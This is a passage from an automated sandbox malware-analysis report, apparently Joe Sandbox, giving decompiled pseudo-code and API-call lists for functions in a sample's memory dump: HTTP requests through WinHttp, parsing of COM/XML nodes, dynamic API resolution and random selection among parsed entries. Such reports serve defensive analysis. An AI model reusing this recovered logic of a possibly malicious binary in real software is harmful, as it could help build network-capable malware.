    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003E160D
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E1634
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E1400
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0), ref: 003E1421
    • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 003E1458
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003E147A
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003E148E
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E14B2
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003E14CF
    • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 003E14EC
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 91%
    			E003C69F0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v216;
    				void* __ebx;
    				void* __edi;
    				void* _t48;
    				void* _t52;
    				void* _t55;
    				short* _t59;
    				void* _t71;
    				void* _t77;
    				intOrPtr _t79;
    				intOrPtr _t85;
    				intOrPtr _t112;
    				intOrPtr _t114;
    				intOrPtr* _t115;
    				void* _t119;
    				void* _t120;
    				void* _t121;
    				void* _t122;
    				void* _t123;
    				void* _t124;
    
    				_t44 = __eax;
    				_push(0x34);
    				_v8 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				L003CA47E();
    				_t120 = _t119 + 4;
    				if(__eax == 0) {
    					_t79 = 0;
    					__eflags = 0;
    				} else {
    					_t44 = E003C70B0(__eax);
    					_t79 = _t44;
    				}
    				_push(0x34);
    				L003CA47E();
    				_t121 = _t120 + 4;
    				_t127 = _t44;
    				if(_t44 == 0) {
    					_t112 = 0;
    					__eflags = 0;
    				} else {
    					_t112 = E003C70B0(_t44);
    				}
    				E003C9090(_t127,  &_v216, 0xcf);
    				_t48 = E003C3C70( &_v12,  &_v216,  &_v8,  &_v12);
    				_t122 = _t121 + 0x14;
    				_t128 = _t48;
    				if(_t48 != 0) {
    					L8:
    					_t49 = _v8;
    					if(_v8 != 0) {
    						_t94 = _v12;
    						if(_v12 > 4) {
    							_t71 = E003E09A0(_a4, _t79,  &_v216, _t49, _t94);
    							E003CBB40(_v8);
    							_t122 = _t122 + 0x18;
    							_v8 = 0;
    							_v12 = 0;
    							if(_t71 == 0) {
    								goto L11;
    							}
    						}
    					}
    				} else {
    					E003C9090(_t128,  &_v216, 0x10);
    					_t77 = E003C3C70( &_v216,  &_v216,  &_v8,  &_v12);
    					_t122 = _t122 + 0x14;
    					if(_t77 == 0) {
    						L11:
    						if(_t79 != 0) {
    							E003CCB70(_t79, _t79, _t112);
    							_push(_t79);
    							L003C1CB0();
    							_t122 = _t122 + 4;
    						}
    						_t79 = 0;
    					} else {
    						goto L8;
    					}
    				}
    				E003C9090(0,  &_v216, 0x12);
    				_t52 = E003CF550( &_v8, 0,  &_v216, 0xa,  &_v8,  &_v12);
    				_t123 = _t122 + 0x1c;
    				if(_t52 == 0 || E003C9020(_t112, _a4, _v8, _v12) == 0) {
    					if(_t112 != 0) {
    						E003CCB70(_t79, _t112, _t112);
    						_push(_t112);
    						L003C1CB0();
    						_t123 = _t123 + 4;
    					}
    					_t112 = 0;
    				}
    				if(_t79 == 0) {
    					__eflags = _t112;
    					if(_t112 == 0) {
    						_t114 = _v16;
    						goto L43;
    					} else {
    						_v16 = 1;
    						goto L26;
    					}
    				} else {
    					if(_t112 == 0 ||  *((intOrPtr*)(_t79 + 0x10)) >  *((intOrPtr*)(_t112 + 0x10))) {
    						_v16 = 2;
    						 *_a8 = _t79;
    						_t142 = _t112;
    						if(_t112 != 0) {
    							E003CCB70(_t79, _t112, _t112);
    							_push(_t112);
    							goto L28;
    						}
    					} else {
    						L26:
    						 *_a8 = _t112;
    						__eflags = _t79;
    						if(__eflags != 0) {
    							E003CCB70(_t79, _t79, _t112);
    							_push(_t79);
    							L28:
    							L003C1CB0();
    							_t123 = _t123 + 4;
    						}
    					}
    					_t115 = _a8;
    					_t55 = E003C2150(_t142,  *_t115);
    					_t124 = _t123 + 4;
    					if(_t55 == 0) {
    						_t59 =  *((intOrPtr*)( *_t115 + 0x14));
    						if(_t59 != 0) {
    							_t85 = 0x7fffffff;
    							while( *_t59 != 0) {
    								_t59 = _t59 + 2;
    								_t85 = _t85 - 1;
    								if(_t85 != 0) {
    									continue;
    								} else {
    								}
    								goto L37;
    							}
    							__eflags = _t85;
    							if(_t85 != 0) {
    								_t117 = 0x7fffffff - _t85;
    								__eflags = 0x7fffffff;
    								E003C9090(0x7fffffff,  &_v216, 0xcd);
    								_t37 = _t117 + 2; // 0x80000001
    								E003C1A80( &_v216,  &_v216,  *((intOrPtr*)( *_a8 + 0x14)), 0x7fffffff - _t85 + _t37);
    								_t124 = _t124 + 0x14;
    							}
    						}
    					}
    					L37:
    					_t114 = _v16;
    					if(_t114 != 0) {
    						L44:
    						return _t114;
    					} else {
    						if(_t79 != 0) {
    							E003CCB70(_t79, _t79, _t112);
    							_push(_t79);
    							L003C1CB0();
    							_t124 = _t124 + 4;
    						}
    						if(_t112 == 0) {
    							L43:
    							 *_a8 = 0;
    							goto L44;
    						} else {
    							E003CCB70(_t79, _t112, _t112);
    							_push(_t112);
    							L003C1CB0();
    							 *_a8 = 0;
    							return _t114;
    						}
    					}
    				}
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C6A09
    • ??2@YAPAXI@Z.MSVCRT ref: 003C6A24
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6C1E
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6ADA
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6B34
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6B88
    • ??3@YAXPAX@Z.MSVCRT ref: 003C6C0A
      • Part of subcall function 003CCB70: SysFreeString.OLEAUT32(?), ref: 003CCB81
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 60%
    			E003CDCD0(void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
    				void* _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* _v24;
    				char _v28;
    				char _v32;
    				short _v36;
    				char _v44;
    				intOrPtr _v48;
    				char _v248;
    				void* __ebx;
    				void* _t69;
    				intOrPtr _t70;
    				intOrPtr _t71;
    				intOrPtr _t72;
    				intOrPtr* _t73;
    				intOrPtr* _t74;
    				intOrPtr* _t84;
    				char _t87;
    				char _t88;
    				char _t89;
    				intOrPtr* _t91;
    				intOrPtr* _t94;
    				void* _t96;
    				intOrPtr* _t100;
    				void* _t103;
    				void* _t106;
    				void* _t109;
    				void* _t110;
    				void* _t115;
    				intOrPtr* _t116;
    				void* _t117;
    				intOrPtr _t131;
    				intOrPtr* _t159;
    				void* _t161;
    				void* _t162;
    				void* _t163;
    
    				_v28 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v8 = 0;
    				_v32 = 0;
    				_v24 = 0;
    				_v36 = 0;
    				E003CBB30( &_v44);
    				_v48 = __ecx + 0x2c;
    				E003C3270(_t115, __ecx + 0x2c);
    				_t159 = _a4;
    				_t69 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x58))))(_t159,  &_v36, __edi, __esi, _t115);
    				_t116 = __imp__#6;
    				if(_t69 >= 0) {
    					if(_v36 != 0xffff) {
    						L22:
    						_v32 = 1;
    					} else {
    						_push( &_v24);
    						_push(_t159);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x30))))() >= 0) {
    							_t84 = _v24;
    							_push( &_v28);
    							_push(_t84);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x20))))() >= 0) {
    								_t161 = 0;
    								if(_v28 <= 0) {
    									goto L22;
    								} else {
    									while(1) {
    										_t87 = _v20;
    										if(_t87 != 0) {
    											 *_t116(_t87);
    										}
    										_t88 = _v12;
    										_v20 = 0;
    										if(_t88 != 0) {
    											 *_t116(_t88);
    										}
    										_t89 = _v16;
    										_v12 = 0;
    										if(_t89 != 0) {
    											 *_t116(_t89);
    										}
    										_v16 = 0;
    										E003CB1E0(_t116,  &_v44);
    										_t91 = _v24;
    										_push( &_v8);
    										_push(_t161);
    										_push(_t91);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))() < 0) {
    											goto L23;
    										}
    										_t94 = _v8;
    										_t96 =  *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0xa4))))(_t94,  &_v20);
    										_t174 = _t96;
    										if(_t96 >= 0) {
    											E003C9090(_t174,  &_v248, 0x25);
    											_t131 =  *0x3e8628; // 0x622508
    											_t162 = _t162 + 8;
    											_push( &_v248);
    											_push(_v20);
    											if( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))() != 0) {
    												L21:
    												_t100 = _v8;
    												 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 8))))(_t100);
    												_t161 = _t161 + 1;
    												_v8 = 0;
    												if(_t161 < _v28) {
    													continue;
    												} else {
    													goto L22;
    												}
    											} else {
    												_t103 = E003CA140( &_v44, _v8);
    												_t176 = _t103;
    												if(_t103 != 0) {
    													E003C9090(_t176,  &_v248, 0x26);
    													_t163 = _t162 + 8;
    													_t106 = E003C1A10( &_v44,  &_v248,  &_v12);
    													_t177 = _t106;
    													if(_t106 != 0) {
    														E003C9090(_t177,  &_v248, 0x27);
    														_t109 = E003C1A10( &_v44,  &_v248,  &_v16);
    														_push(0xc);
    														L003CA47E();
    														_t162 = _t163 + 0xc;
    														if(_t109 == 0) {
    															_t110 = 0;
    															__eflags = 0;
    														} else {
    															_t110 = E003C2120(_t109, _v12, _v16, 0);
    														}
    														if(E003D0A50(_v48, _t110) != 0) {
    															goto L21;
    														}
    													}
    												}
    											}
    										}
    										goto L23;
    									}
    								}
    							}
    						}
    					}
    				}
    				L23:
    				_t70 = _v20;
    				if(_t70 != 0) {
    					 *_t116(_t70);
    				}
    				_t71 = _v12;
    				if(_t71 != 0) {
    					 *_t116(_t71);
    				}
    				_t72 = _v16;
    				if(_t72 != 0) {
    					 *_t116(_t72);
    				}
    				_t73 = _v8;
    				if(_t73 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
    				}
    				_t74 = _v24;
    				_pop(_t117);
    				if(_t74 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
    				}
    				L003C26B0(_t117,  &_v44);
    				return _v32;
    			}

    APIs
      • Part of subcall function 003C3270: ??3@YAXPAX@Z.MSVCRT ref: 003C3291
    • SysFreeString.OLEAUT32(?), ref: 003CDD78
    • SysFreeString.OLEAUT32(?), ref: 003CDD85
    • SysFreeString.OLEAUT32(?), ref: 003CDD92
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB1F8
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB201
    • ??2@YAPAXI@Z.MSVCRT ref: 003CDE65
      • Part of subcall function 003D0A50: ??2@YAPAXI@Z.MSVCRT ref: 003D0A7F
      • Part of subcall function 003C2120: SysAllocString.OLEAUT32(00000000), ref: 003C2131
      • Part of subcall function 003C2120: SysAllocString.OLEAUT32(?), ref: 003C2139
    • SysFreeString.OLEAUT32(?), ref: 003CDEB9
    • SysFreeString.OLEAUT32(?), ref: 003CDEC3
    • SysFreeString.OLEAUT32(?), ref: 003CDECD
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
      • Part of subcall function 003E1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1D73
    • ??3@YAXPAX@Z.MSVCRT ref: 003E1082
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 72%
    			E003C3E30(intOrPtr __ecx, intOrPtr* _a4) {
    				signed int _v8;
    				void* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				intOrPtr* _v28;
    				intOrPtr _v32;
    				signed int _v36;
    				void* _v40;
    				signed int _v44;
    				intOrPtr* _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				short _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				signed int _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				char _v280;
    				signed int _t171;
    				signed int _t172;
    				intOrPtr* _t173;
    				intOrPtr* _t174;
    				intOrPtr* _t180;
    				intOrPtr _t188;
    				signed int _t198;
    				signed int _t207;
    				signed int _t208;
    				intOrPtr* _t209;
    				intOrPtr* _t212;
    				void* _t214;
    				intOrPtr* _t218;
    				signed int _t220;
    				intOrPtr _t227;
    				intOrPtr _t229;
    				intOrPtr _t230;
    				intOrPtr _t231;
    				signed int _t234;
    				signed int _t236;
    				signed int _t242;
    				signed int _t244;
    				intOrPtr _t267;
    				intOrPtr _t271;
    				intOrPtr _t274;
    				signed int _t276;
    				intOrPtr* _t277;
    				signed int _t278;
    				intOrPtr* _t279;
    				intOrPtr* _t293;
    				signed int _t304;
    				intOrPtr* _t306;
    				intOrPtr _t308;
    				intOrPtr _t310;
    				signed int _t312;
    				intOrPtr* _t313;
    				void* _t314;
    				intOrPtr _t316;
    				void* _t317;
    				void* _t318;
    				void* _t320;
    				void* _t321;
    
    				_t306 = _a4;
    				_t244 = 0;
    				_t310 = __ecx;
    				_push( &_v60);
    				_push(_t306);
    				_v56 = __ecx;
    				_v8 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v52 = 0;
    				_v40 = 0;
    				_v60 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x58))))() < 0 || _v60 != 0xffff) {
    					L62:
    					_t171 = _v24;
    					if(_t171 != _t244) {
    						__imp__#6(_t171);
    					}
    					_t172 = _v20;
    					if(_t172 != _t244) {
    						__imp__#6(_t172);
    					}
    					_t173 = _v16;
    					if(_t173 != _t244) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 8))))(_t173);
    					}
    					_t174 = _v40;
    					if(_t174 != _t244) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
    					}
    					return _v52;
    				} else {
    					_push( &_v40);
    					_push(_t306);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x30))))() < 0) {
    						goto L62;
    					}
    					_t180 = _v40;
    					_push( &_v8);
    					_push(_t180);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x20))))() < 0) {
    						goto L62;
    					}
    					_v28 = E003D1D90(_v8 * 4, 0);
    					_v32 = E003D1D90(_v8 * 4, 0);
    					_t308 = E003D1D90(_v8 * 8, 0);
    					_t188 = E003D1D90(_v8 * 8, 0);
    					_t318 = _t317 + 0x20;
    					_v68 = _t188;
    					if(_v28 == 0) {
    						L60:
    						_t189 = _v32;
    						if(_v32 != _t244) {
    							E003CBB40(_t189);
    						}
    						goto L62;
    					}
    					if(_v32 == 0 || _t308 == 0 || _t188 == 0) {
    						L59:
    						E003CBB40(_v28);
    						_t318 = _t318 + 4;
    						goto L60;
    					} else {
    						if(_v8 <= 0) {
    							L46:
    							_t192 =  *((intOrPtr*)(_t310 + 0x1c));
    							if( *((intOrPtr*)(_t310 + 0x1c)) != 0) {
    								E003CBB40(_t192);
    								_t318 = _t318 + 4;
    							}
    							_t193 =  *((intOrPtr*)(_t310 + 0x20));
    							if( *((intOrPtr*)(_t310 + 0x20)) != 0) {
    								E003CBB40(_t193);
    								_t318 = _t318 + 4;
    							}
    							 *((intOrPtr*)(_t310 + 0x1c)) = E003D1D90(_v8 * 4, 0);
    							 *((intOrPtr*)(_t310 + 0x20)) = E003D1D90(_v8 * 4, 0);
    							_t198 = 0;
    							_t318 = _t318 + 0x10;
    							if(_v8 <= 0) {
    								L53:
    								_t199 =  *((intOrPtr*)(_t310 + 0x24));
    								if( *((intOrPtr*)(_t310 + 0x24)) != 0) {
    									E003CBB40(_t199);
    									_t318 = _t318 + 4;
    								}
    								_t200 =  *((intOrPtr*)(_t310 + 0x28));
    								if( *((intOrPtr*)(_t310 + 0x28)) != 0) {
    									E003CBB40(_t200);
    									_t318 = _t318 + 4;
    								}
    								 *((intOrPtr*)(_t310 + 0x24)) = _t308;
    								 *((intOrPtr*)(_t310 + 0x28)) = _v68;
    								 *((intOrPtr*)(_t310 + 0x18)) = _v8;
    								_v52 = 1;
    								L58:
    								_t244 = 0;
    								goto L59;
    							} else {
    								do {
    									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x1c)) + _t198 * 4)) =  *((intOrPtr*)(_v28 +  *(_t308 + _t198 * 8) * 4));
    									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x20)) + _t198 * 4)) =  *((intOrPtr*)(_v32 +  *(_t308 + _t198 * 8) * 4));
    									 *(_t308 + _t198 * 8) = 0;
    									 *(_t308 + 4 + _t198 * 8) = 0;
    									_t198 = _t198 + 1;
    								} while (_t198 < _v8);
    								goto L53;
    							}
    						}
    						_t293 = _v28;
    						_a4 = _t308;
    						_v48 = _t293;
    						_v64 = _v32 - _t293;
    						_v80 = _t188 - _t308;
    						while(1) {
    							_t207 = _v20;
    							if(_t207 != 0) {
    								__imp__#6(_t207);
    							}
    							_t208 = _v24;
    							_v20 = 0;
    							if(_t208 != 0) {
    								__imp__#6(_t208);
    							}
    							_t209 = _v40;
    							_push( &_v16);
    							_v24 = 0;
    							_push(_t244);
    							_push(_t209);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0x1c))))() < 0) {
    								goto L58;
    							}
    							_t212 = _v16;
    							_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0xa4))))(_t212,  &_v24);
    							_t334 = _t214;
    							if(_t214 < 0) {
    								goto L58;
    							}
    							E003C9090(_t334,  &_v280, 0x28);
    							_t267 =  *0x3e8628; // 0x622508
    							_t318 = _t318 + 8;
    							_push( &_v280);
    							_push(_v24);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0xe0))))() != 0) {
    								L45:
    								_t218 = _v16;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 8))))(_t218);
    								_v48 = _v48 + 4;
    								_a4 = _a4 + 8;
    								_t244 = _t244 + 1;
    								_v16 = 0;
    								if(_t244 < _v8) {
    									continue;
    								}
    								goto L46;
    							}
    							_t220 = _v16;
    							_push( &_v20);
    							_push(_t220);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t220 + 0x68))))() < 0) {
    								goto L58;
    							}
    							_t312 = E003C7B80(_v20, 0x3e330c,  &_v12, 2);
    							_t320 = _t318 + 0x10;
    							if(_t312 != 2) {
    								__eflags = _t312;
    								if(_t312 <= 0) {
    									L73:
    									E003CBB40(_v12);
    									_t318 = _t320 + 4;
    									goto L58;
    								} else {
    									goto L72;
    								}
    								do {
    									L72:
    									_t271 =  *((intOrPtr*)(_v12 + _t312 * 4 - 4));
    									_t312 = _t312 - 1;
    									E003CBB40(_t271);
    									_t320 = _t320 + 4;
    									__eflags = _t312;
    								} while (_t312 > 0);
    								goto L73;
    							}
    							_t227 = _v12;
    							__imp___wtoi( *((intOrPtr*)(_t227 + 4)));
    							_t313 = _v48;
    							 *((intOrPtr*)(_v64 + _t313)) = _t227;
    							_t229 = E003C66C0( *_v12);
    							_t274 = _v80;
    							 *_t313 = _t229;
    							_t230 = _a4;
    							_t321 = _t320 + 8;
    							 *(_t274 + _t230) = 0;
    							 *(_t274 + _t230 + 4) = 0;
    							_t314 = 8;
    							do {
    								_t231 =  *((intOrPtr*)(_t314 + _v12 - 4));
    								_t314 = _t314 - 4;
    								E003CBB40(_t231);
    								_t321 = _t321 + 4;
    							} while (_t314 > 0);
    							E003CBB40(_v12);
    							_t318 = _t321 + 4;
    							_v44 = 0;
    							do {
    								_t234 = rand();
    								asm("cdq");
    								_t304 = _t234 % _v8;
    								_t276 = 0;
    								_t236 = _t304;
    								_v36 = _t236;
    								if(_t244 <= 0) {
    									L27:
    									if(_t276 == _t244) {
    										_t277 = _a4;
    										asm("cdq");
    										 *_t277 = _v36;
    										 *(_t277 + 4) = _t304;
    										L31:
    										if(_v44 != 0x3e8) {
    											L44:
    											_t310 = _v56;
    											goto L45;
    										}
    										_t316 = _v36 + 1;
    										if(_t316 == _v36) {
    											goto L44;
    										} else {
    											goto L33;
    										}
    										do {
    											L33:
    											if(_t316 == _v8) {
    												_t316 = 0;
    											}
    											_t278 = 0;
    											if(_t244 <= 0) {
    												L40:
    												if(_t278 == _t244) {
    													_t279 = _a4;
    													asm("cdq");
    													 *_t279 = _t316;
    													 *(_t279 + 4) = _t304;
    													goto L44;
    												}
    											} else {
    												asm("cdq");
    												_v76 = _t316;
    												_v72 = _t304;
    												while(1) {
    													_t304 =  *(_t308 + _t278 * 8);
    													if(_t304 == _v76 &&  *((intOrPtr*)(_t308 + 4 + _t278 * 8)) == _v72) {
    														goto L40;
    													}
    													_t278 = _t278 + 1;
    													if(_t278 < _t244) {
    														continue;
    													}
    													goto L40;
    												}
    												goto L40;
    											}
    											_t316 = _t316 + 1;
    										} while (_t316 != _v36);
    										goto L44;
    									}
    									goto L28;
    								}
    								asm("cdq");
    								while( *((intOrPtr*)(_t308 + _t276 * 8)) != _t236 ||  *((intOrPtr*)(_t308 + 4 + _t276 * 8)) != _t304) {
    									_t276 = _t276 + 1;
    									if(_t276 < _t244) {
    										continue;
    									}
    									goto L27;
    								}
    								goto L27;
    								L28:
    								_t242 = _v44 + 1;
    								_v44 = _t242;
    							} while (_t242 < 0x3e8);
    							goto L31;
    						}
    						goto L58;
    					}
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003C3F48
    • SysFreeString.OLEAUT32(?), ref: 003C3F5D
    • _wtoi.MSVCRT ref: 003C400E
    • rand.MSVCRT ref: 003C4080
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • SysFreeString.OLEAUT32(?), ref: 003C422F
    • SysFreeString.OLEAUT32(?), ref: 003C423D
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 71%
    			E003CBF60(intOrPtr __ecx, signed int* _a4) {
    				signed int _v8;
    				void* _v12;
    				void* _v16;
    				char _v20;
    				char _v24;
    				void* _v28;
    				intOrPtr _v32;
    				signed int _v36;
    				short _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				char _v256;
    				intOrPtr _t128;
    				intOrPtr _t129;
    				intOrPtr* _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t137;
    				signed int* _t144;
    				intOrPtr _t148;
    				intOrPtr _t156;
    				signed int _t157;
    				char _t163;
    				char _t164;
    				intOrPtr* _t165;
    				intOrPtr* _t168;
    				void* _t170;
    				intOrPtr* _t174;
    				intOrPtr* _t176;
    				intOrPtr _t183;
    				signed int _t189;
    				signed int _t191;
    				signed int _t192;
    				signed int* _t194;
    				signed int _t205;
    				intOrPtr _t212;
    				signed int _t220;
    				intOrPtr _t242;
    				signed int _t243;
    				signed int _t246;
    				intOrPtr _t248;
    				intOrPtr* _t250;
    				intOrPtr _t252;
    				signed int _t255;
    				intOrPtr* _t257;
    				void* _t258;
    				void* _t259;
    				void* _t260;
    				void* _t261;
    				void* _t263;
    				void* _t264;
    
    				_t250 = _a4;
    				_t246 = 0;
    				_v52 = __ecx;
    				_push( &_v40);
    				_push(_t250);
    				_v8 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v36 = 0;
    				_v28 = 0;
    				_v40 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x58))))() >= 0 && _v40 == 0xffff) {
    					_push( &_v28);
    					_push(_t250);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x30))))() >= 0) {
    						_t137 = _v28;
    						_push( &_v8);
    						_push(_t137);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x20))))() >= 0) {
    							_t252 = E003D1D90(_v8 * 4, 0);
    							_v44 = _t252;
    							_v32 = E003D1D90(_v8 * 4, 0);
    							_t144 = E003D1D90(_v8 * 8, 0);
    							_t261 = _t260 + 0x18;
    							_t194 = _t144;
    							if(_t252 != 0) {
    								_t148 = _v32;
    								if(_t148 != 0) {
    									if(_v8 <= 0) {
    										L41:
    										_t248 = _v52;
    										_t151 =  *((intOrPtr*)(_t248 + 0x1c));
    										if( *((intOrPtr*)(_t248 + 0x1c)) != 0) {
    											E003CBB40(_t151);
    											_t261 = _t261 + 4;
    										}
    										_t152 =  *((intOrPtr*)(_t248 + 0x20));
    										if( *((intOrPtr*)(_t248 + 0x20)) != 0) {
    											E003CBB40(_t152);
    											_t261 = _t261 + 4;
    										}
    										 *((intOrPtr*)(_t248 + 0x1c)) = E003D1D90(_v8 * 4, 0);
    										_t156 = E003D1D90(_v8 * 4, 0);
    										_t205 = _v8;
    										 *((intOrPtr*)(_t248 + 0x20)) = _t156;
    										_t261 = _t261 + 0x10;
    										_t157 = 0;
    										if(_t205 > 0) {
    											do {
    												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x1c)) + _t157 * 4)) =  *((intOrPtr*)(_v44 +  *(_t194 + _t157 * 4) * 4));
    												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x20)) + _t157 * 4)) =  *((intOrPtr*)(_v32 +  *(_t194 + _t157 * 4) * 4));
    												_t205 = _v8;
    												_t157 = _t157 + 1;
    											} while (_t157 < _t205);
    										}
    										 *((intOrPtr*)(_t248 + 0x18)) = _t205;
    										 *((intOrPtr*)(_t248 + 0x24)) = 0;
    										_v36 = 1;
    									} else {
    										_v56 = _t148 - _t252;
    										_a4 = _t194;
